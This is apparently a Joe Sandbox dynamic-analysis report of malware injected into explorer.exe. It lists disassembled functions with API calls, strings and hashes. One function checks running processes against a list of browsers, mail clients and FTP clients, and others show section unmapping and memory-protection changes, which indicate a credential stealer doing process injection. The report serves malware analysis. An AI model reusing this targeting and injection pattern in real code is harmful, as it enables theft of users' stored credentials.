_allmul.NTDLL(-00000001,00000000,?,?), ref: 00C431D2
_alldiv.NTDLL(?,?,00000000), ref: 00C432DE
_allmul.NTDLL(00000000,?,00000000), ref: 00C432E7
_allmul.NTDLL(?,00000000,?,?), ref: 00C43392

Part of subcall function 00C416CD: memset.NTDLL ref: 00C4172B

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: _allmul$_alldivmemset
String ID:
API String ID: 3880648599-0
Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
Instruction ID: 84fbe9b05e4444ea29488f0fa4e4f1c38af9bfd965bd87f837f85a6a00020482
Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
Instruction Fuzzy Hash: 37D189716083818BDB24DF69C480B6EBBE1BFC8704F14492DF9A587261DB70DE46CB92

Function 00C687FA Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 388COMMON

Download Yara Rule

Strings

FOREIGN KEY constraint failed, xrefs: 00C68AC8
old, xrefs: 00C6889E
new, xrefs: 00C688AA

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID:
String ID: FOREIGN KEY constraint failed$new$old
API String ID: 0-384346570
Opcode ID: a223d6bd214c1b92117d8f4f3c21318978039305b23c0dec721b1e02411ae995
Instruction ID: cd38b0644d38a910561d0712d9958dcfa797bceb0bd9f42802ab3211938ae4e6
Opcode Fuzzy Hash: a223d6bd214c1b92117d8f4f3c21318978039305b23c0dec721b1e02411ae995
Instruction Fuzzy Hash: 55D14B74708300AFD724DF25C881B2FBBE9ABC8750F104A1EF9458B291DB74D989DB96

Function 00C396BC Relevance: 6.4, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

_alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 00C396E7
_alldiv.NTDLL(00000000,80000000,?,?), ref: 00C39707
_alldiv.NTDLL(00000000,80000000,?,?), ref: 00C39739
_alldiv.NTDLL(00000001,80000000,?,?), ref: 00C3976C
_allmul.NTDLL(?,?,?,?), ref: 00C39798

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: _alldiv$_allmul
String ID:
API String ID: 4215241517-0
Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
Instruction ID: 99367503d96dc5002108ab4dab652430377104420b729b0236013416dfa75678
Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
Instruction Fuzzy Hash: 272127312397552AD7747D1A8CC2B2B76A8CBD37A4F24412EFD23C22D1E9F28C4085A1

Function 00C4B162 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000000), ref: 00C4B1B3
_alldvrm.NTDLL(?,?,00000000), ref: 00C4B20F
_allrem.NTDLL(?,00000000,?,?), ref: 00C4B28A
memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 00C4B298

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: _alldvrm_allmul_allremmemcpy
String ID:
API String ID: 1484705121-0
Opcode ID: 6c59070d6f8374fcd7fc8a65f60d9711abbfbf526d7af0219c6e8549b4ec9b69
Instruction ID: 3a2a34367274ed88928eb4a861108e1b2fed4f7b9c8be8f7d44ae856c011d8a9
Opcode Fuzzy Hash: 6c59070d6f8374fcd7fc8a65f60d9711abbfbf526d7af0219c6e8549b4ec9b69
Instruction Fuzzy Hash: 044126756083019FC718EF29C891A2EBBE6BFC8300F14892DF99587262DB71ED05DB52

Function 00C31895 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetHGlobalFromStream.COMBASE(?,?), ref: 00C318A7
GlobalLock.KERNEL32(00C34B57), ref: 00C318B6
GlobalUnlock.KERNEL32(?), ref: 00C318F4

Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A

RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00C318E8

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
String ID:
API String ID: 1688112647-0
Opcode ID: 4d4e8670019056a5878584ca689d27323cb9736d52d9eb01e64abe0ef8707e92
Instruction ID: 2dce64f628807ef39e18b733557873b794d600cb11cec790d26c6f3b764a2f42
Opcode Fuzzy Hash: 4d4e8670019056a5878584ca689d27323cb9736d52d9eb01e64abe0ef8707e92
Instruction Fuzzy Hash: 2B016D75210306AF8B015F69AC58A9FBBA9EF84351F08843AF85587260DF31C9049B69

Function 00C31953 Relevance: 6.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,00000000,?,?,00C32F0C), ref: 00C31973
lstrlenW.KERNEL32(00C86564,?,?,00C32F0C), ref: 00C31978
lstrcatW.KERNEL32(00000000,?,?,?,00C32F0C), ref: 00C31990
lstrcatW.KERNEL32(00000000,00C86564,?,?,00C32F0C), ref: 00C31994

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: lstrcatlstrlen
String ID:
API String ID: 1475610065-0
Opcode ID: 835c6c75e3a1ec51ac56811d7904d661500f5d4ccc1490fa41010e31c9cafc68
Instruction ID: 8f6d54efa7a02a429c78e9921f593d68de5387d8fc37e31e9494bbf317a3a959
Opcode Fuzzy Hash: 835c6c75e3a1ec51ac56811d7904d661500f5d4ccc1490fa41010e31c9cafc68
Instruction Fuzzy Hash: 7DE06DA230021C2F472477AE9C94F7B7A9CCAC96A57090039FE08D3302EE56AC0546B8

Function 00C5F21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 00C36A81: memset.NTDLL ref: 00C36A9C

_aulldiv.NTDLL(?,00000000,?,00000000), ref: 00C5F2A1

Strings

%llu, xrefs: 00C5F2A8
%llu, xrefs: 00C5F25E

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: _aulldivmemset
String ID: %llu$%llu
API String ID: 714058258-4283164361
Opcode ID: 5e3c188adbf3beb2eb3698d98f0e680b9970f6df31342c7dda641a8e0cfcc2a4
Instruction ID: 1576453bf093db29d7f9fa540c7de178e8710b81c65de5548bf96a42c2f2a1de
Opcode Fuzzy Hash: 5e3c188adbf3beb2eb3698d98f0e680b9970f6df31342c7dda641a8e0cfcc2a4
Instruction Fuzzy Hash: D62123B26446057BC714AA64CC42F6BB7A8EF85730F04433CF922972C1DB20DD1697E5

Function 00C4203C Relevance: 5.3, APIs: 4, Instructions: 274COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,?), ref: 00C42174
_allmul.NTDLL(?,?,?,00000000), ref: 00C4220E
_allmul.NTDLL(?,00000000,00000000,?), ref: 00C42241
_allmul.NTDLL(00C32E26,00000000,?,?), ref: 00C42295

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: _allmul
String ID:
API String ID: 4029198491-0
Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
Instruction ID: 9f73f87525f9cdbc15c95d2ba5768b681000fd8e9ead9f1422fb736aae52dfc9
Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
Instruction Fuzzy Hash: D0A18C707087019BD724EF65C882A2EB7E5BFD8754F40482CFA958B261EBB0ED458B42

Function 00C478B9 Relevance: 5.2, APIs: 4, Instructions: 227COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?,?), ref: 00C47979
memset.NTDLL ref: 00C4798A
memcpy.NTDLL(?,?,?), ref: 00C47A00
memset.NTDLL ref: 00C47A14

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: bee109c9e61ecd5cd23fbb9cf3c2bcfa4cb41aac7cb38f3f7afcac6f8fd0f8ac
Instruction ID: bfd063b31989d0d1dc671378eeba1efcf57b08997bd6c0b6afbc821dd866415d
Opcode Fuzzy Hash: bee109c9e61ecd5cd23fbb9cf3c2bcfa4cb41aac7cb38f3f7afcac6f8fd0f8ac
Instruction Fuzzy Hash: 1F818D716083149FC350EF29C984A2BBBE5FF98704F144A2DF88A97352E770EA05DB91

Function 00C3190B Relevance: 5.0, APIs: 4, Instructions: 36stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,?,?,00000000,00C32783), ref: 00C3192B
lstrlen.KERNEL32(00000000,?,?,?,00000000,00C32783), ref: 00C31930
lstrcat.KERNEL32(00000000,?), ref: 00C31946
lstrcat.KERNEL32(00000000,00000000), ref: 00C3194A

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: lstrcatlstrlen
String ID:
API String ID: 1475610065-0
Opcode ID: 51fee66fda773f04346fbdcf73e182227703a289fc0d0df442ee829c78a6c26f
Instruction ID: 4986616d7e7efef20370db26f8cb181d41483896bf9a9cf4d229e8f79d2a7ea5
Opcode Fuzzy Hash: 51fee66fda773f04346fbdcf73e182227703a289fc0d0df442ee829c78a6c26f
Instruction Fuzzy Hash: AAE06DA230021C2F4A2076AE6C94F7BB69CCAD96A57090035FE04C3202EA56AC0187B8

Analysis Process: explorer.exePID: 5268, Parent PID: 4084COMMON

Execution Graph

Execution Coverage:	20.5%
Dynamic/Decrypted Code Coverage:	87.3%
Signature Coverage:	0%
Total number of Nodes:	181
Total number of Limit Nodes:	17

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00D330A8 Relevance: 4.7, APIs: 3, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE ref: 00D33104
FindNextFileW.KERNELBASE ref: 00D33218
FindClose.KERNELBASE ref: 00D33229

Memory Dump Source

Source File: 0000000D.00000002.2384765301.0000000000D31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d31000_explorer.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
Instruction ID: d6eb17e84af514cf79b7acb104218dcca348f73fb7d508f495b5400fb023a337
Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
Instruction Fuzzy Hash: 5B419130718B4D5FDB94FB3898897BA73D2FBD8340F444A29A44AC3151EE78D90487A1

Function 00D338B0 Relevance: 1.5, APIs: 1, Instructions: 40
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00D338F2

Memory Dump Source

Source File: 0000000D.00000002.2384765301.0000000000D31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d31000_explorer.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
Instruction ID: 1115b4739a6abb72ec3cbe490a77be77108f65912a29b09d9e447e9dc6757178
Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
Instruction Fuzzy Hash: 34F0E524F11A091BEF6C77BD695D33822C0EB58311F50092AB515C72D2DC3D8E458331

Function 00D32774 Relevance: 6.1, APIs: 4, Instructions: 124
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE ref: 00D327C7
RegQueryValueExW.KERNELBASE ref: 00D327F4
RegQueryValueExW.KERNELBASE ref: 00D3283A
RegCloseKey.KERNELBASE ref: 00D32860

Part of subcall function 00D31860: RtlFreeHeap.NTDLL ref: 00D31880

Memory Dump Source

Source File: 0000000D.00000002.2384765301.0000000000D31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d31000_explorer.jbxd

Similarity

API ID: QueryValue$CloseFreeHeapOpen
String ID:
API String ID: 1641618270-0
Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
Instruction ID: c084f4260be30341d2a4d4a13496dcbe78746d5368d02dc412c955671cfc6145
Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
Instruction Fuzzy Hash: 5B31A53060CB498FE768DB28D45877A7BD0FBA8355F54062EE48AC2264DF34C8468752

Function 00D3372C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE ref: 00D337B2
RegCloseKey.KERNELBASE ref: 00D337C1

Strings

?, xrefs: 00D337A2

Memory Dump Source

Source File: 0000000D.00000002.2384765301.0000000000D31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d31000_explorer.jbxd

Similarity

API ID: CloseCreate
String ID: ?
API String ID: 2932200918-1684325040
Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
Instruction ID: b62b6a1ff014cd2519a4bba967cf66a6149ef93d399b66b4262ec6e52a005a69
Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
Instruction Fuzzy Hash: 94118270618B4C8FD751DF69D48866AB7E1FB98345F540A2EE48AC3360DF38D985CB82

Function 00D3A298 Relevance: 4.8, APIs: 3, Instructions: 252
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00D3A397
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00D3A441
VirtualProtect.KERNELBASE ref: 00D3A45F

Memory Dump Source

Source File: 0000000D.00000002.2384765301.0000000000D39000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D39000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d39000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
Instruction ID: e11c062a983505861510b581fde4c689dd20a05f73e04502ca81a5005b8a8266
Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
Instruction Fuzzy Hash: 6551573275891D4BCB24ABBC9CC43F5B3D1F759321F1C062AC4DAC3284EA59D84683A7

Function 00D33254 Relevance: 4.7, APIs: 3, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D3298C: GetFileAttributesW.KERNELBASE ref: 00D3299E

GetPrivateProfileSectionNamesW.KERNEL32 ref: 00D3330F
GetPrivateProfileStringW.KERNEL32 ref: 00D3336F
GetPrivateProfileIntW.KERNEL32 ref: 00D3338C

Part of subcall function 00D330A8: FindFirstFileW.KERNELBASE ref: 00D33104

Part of subcall function 00D31860: RtlFreeHeap.NTDLL ref: 00D31880

Memory Dump Source

Source File: 0000000D.00000002.2384765301.0000000000D31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d31000_explorer.jbxd

Similarity

API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
String ID:
API String ID: 970345848-0
Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
Instruction ID: 48e2fbb621084c0f7c8e7b2638d60c9b22ad9a89f7a9dabda5b2439df50c0e6e
Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
Instruction Fuzzy Hash: 3451D830718F0D4FEB59BB2CA85667973D2EB98300F48456DE40AC3296EE64DE4187B6

Function 00D33458 Relevance: 4.7, APIs: 3, Instructions: 172
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIW.KERNELBASE ref: 00D3347E
RegOpenKeyExW.KERNELBASE ref: 00D3353F
RegEnumKeyExW.KERNELBASE ref: 00D335D6

Part of subcall function 00D32774: RegOpenKeyExW.KERNELBASE ref: 00D327C7
Part of subcall function 00D32774: RegQueryValueExW.KERNELBASE ref: 00D327F4
Part of subcall function 00D32774: RegQueryValueExW.KERNELBASE ref: 00D3283A
Part of subcall function 00D32774: RegCloseKey.KERNELBASE ref: 00D32860

Part of subcall function 00D33254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 00D3330F

Part of subcall function 00D31860: RtlFreeHeap.NTDLL ref: 00D31880

Memory Dump Source

Source File: 0000000D.00000002.2384765301.0000000000D31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d31000_explorer.jbxd

Similarity

API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
String ID:
API String ID: 1841478724-0
Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
Instruction ID: 9d1b30db6feba2e20116569db840c9256549f85a1d2ad1bb3e1c78511d0b950e
Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
Instruction Fuzzy Hash: 2F417A30B18B0D4FDB98EF6D849972AB6E2FB98341F44456EA14EC3261DF34D9448B62

Function 00D32938 Relevance: 3.0, APIs: 2, Instructions: 34
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00D32966
CloseHandle.KERNELBASE ref: 00D3297A

Memory Dump Source

Source File: 0000000D.00000002.2384765301.0000000000D31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d31000_explorer.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
Instruction ID: 54009efc2533620cff00001242c7dd9efdb40ca982275898c5cca7ce181336e1
Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
Instruction Fuzzy Hash: 54F02B7065570A4FE7446FB84498336B5D0FB08315F1C473DE49AC22D0D734C8428B22

Function 00D322B4 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE ref: 00D322D0

Memory Dump Source

Source File: 0000000D.00000002.2384765301.0000000000D31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d31000_explorer.jbxd

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
Instruction ID: 165586a3aa49251232a70bbad1e9e3f0e480b6d5128ea9c387fe1e176c7582b6
Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
Instruction Fuzzy Hash: 76E08C30109B0A8FD758AFBCE4CA07A33A1EB9C252B09053EE005CB114D27988C18751

Function 00D3298C Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE ref: 00D3299E

Memory Dump Source

Source File: 0000000D.00000002.2384765301.0000000000D31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d31000_explorer.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
Instruction ID: 575d9e528527d531e21e324578a4325142a76f405fcc397ad41b243265c6f277
Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
Instruction Fuzzy Hash: 62D0A732F52905077B6426F90CDD37130A0D71932AF1C033AEA36C12E0E2D5CCD5A631

Function 00D31860 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL ref: 00D31880

Memory Dump Source

Source File: 0000000D.00000002.2384765301.0000000000D31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d31000_explorer.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
Instruction ID: d4c9b74b2d520a44580a1d4440cca1da7498c5e01c79460fbe0a42b3af79cbee
Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
Instruction Fuzzy Hash: 97D01228716A090BEF2CBBFA1C8D174BAD2E758212F1C8065B819C3251DD39C895C365

Analysis Process: explorer.exePID: 1996, Parent PID: 4084COMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	97.4%
Signature Coverage:	27.5%
Total number of Nodes:	306
Total number of Limit Nodes:	42

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00C21016 Relevance: 89.5, APIs: 30, Strings: 21, Instructions: 244
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C22608: VirtualQuery.KERNEL32(00C24434,?,0000001C), ref: 00C22615

Part of subcall function 00C22861: GetProcessHeap.KERNEL32(00000008,0000A000,00C210CC), ref: 00C22864
Part of subcall function 00C22861: RtlAllocateHeap.NTDLL(00000000), ref: 00C2286B

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00C21038
RtlMoveMemory.NTDLL(00000000,?,?), ref: 00C2106B
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00C21074
GetCurrentProcessId.KERNEL32(?,00C21010), ref: 00C2107A
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C210DF
Process32First.KERNEL32(00000000,?), ref: 00C210FE
lstrcmpiA.KERNEL32(?,firefox.exe), ref: 00C2111A
lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 00C2112E
lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00C21142
lstrcmpiA.KERNEL32(?,opera.exe), ref: 00C21156
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00C21166
lstrcmpiA.KERNEL32(?,outlook.exe), ref: 00C2117A
lstrcmpiA.KERNEL32(?,thebat.exe), ref: 00C2118E
lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 00C211A2
lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 00C211B6
lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 00C211CA
lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 00C211DE
lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 00C211F2
lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00C21206
lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00C21216
lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00C21226
lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00C21236
lstrcmpiA.KERNEL32(?,263em.exe), ref: 00C21246
lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00C21256
lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00C21266
lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00C21276
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00C212B4
Process32Next.KERNEL32(00000000,00000128), ref: 00C2130B
CloseHandle.KERNELBASE(00000000), ref: 00C2131C
Sleep.KERNELBASE(000003E8), ref: 00C21327

Strings

winscp.exe, xrefs: 00C211FC
thunderbird.exe, xrefs: 00C211C0
outlook.exe, xrefs: 00C21170
thebat32.exe, xrefs: 00C21198
thebat.exe, xrefs: 00C21184
flashfxp.exe, xrefs: 00C2120C
iexplore.exe, xrefs: 00C21124
filezilla.exe, xrefs: 00C211D4
microsoftedgecp.exe, xrefs: 00C210D2, 00C21160, 00C212AE
mailmaster.exe, xrefs: 00C2122C
foxmail.exe, xrefs: 00C2124C
thebat64.exe, xrefs: 00C211AC
0-FwP,Fw, xrefs: 00C21074
chrome.exe, xrefs: 00C21138
cuteftppro.exe, xrefs: 00C2121C
263em.exe, xrefs: 00C2123C
smartftp.exe, xrefs: 00C211E8
opera.exe, xrefs: 00C2114C
alimail.exe, xrefs: 00C2125C
mailchat.exe, xrefs: 00C2126C
firefox.exe, xrefs: 00C21114

Memory Dump Source

Source File: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c21000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
String ID: 0-FwP,Fw$263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
API String ID: 2555639992-2259378096
Opcode ID: 860c82d3524362fdab809434e154b159a6ca39d89bda2eef6c0e765ee22919db
Instruction ID: 29079792f85c6b11f144cd8d9455a0c58d5a4bd7052e642b386c80f5c1a84716
Opcode Fuzzy Hash: 860c82d3524362fdab809434e154b159a6ca39d89bda2eef6c0e765ee22919db
Instruction Fuzzy Hash: 2C719271604365EBCB14EBB1BC45F6E7BACAF55780B080929FD50C28A1DF39DB068A74

Function 00C210A4 Relevance: 80.7, APIs: 26, Strings: 20, Instructions: 203
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C22861: GetProcessHeap.KERNEL32(00000008,0000A000,00C210CC), ref: 00C22864
Part of subcall function 00C22861: RtlAllocateHeap.NTDLL(00000000), ref: 00C2286B

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C210DF
Process32First.KERNEL32(00000000,?), ref: 00C210FE
lstrcmpiA.KERNEL32(?,firefox.exe), ref: 00C2111A
lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 00C2112E
lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00C21142
lstrcmpiA.KERNEL32(?,opera.exe), ref: 00C21156
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00C21166
lstrcmpiA.KERNEL32(?,outlook.exe), ref: 00C2117A
lstrcmpiA.KERNEL32(?,thebat.exe), ref: 00C2118E
lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 00C211A2
lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 00C211B6
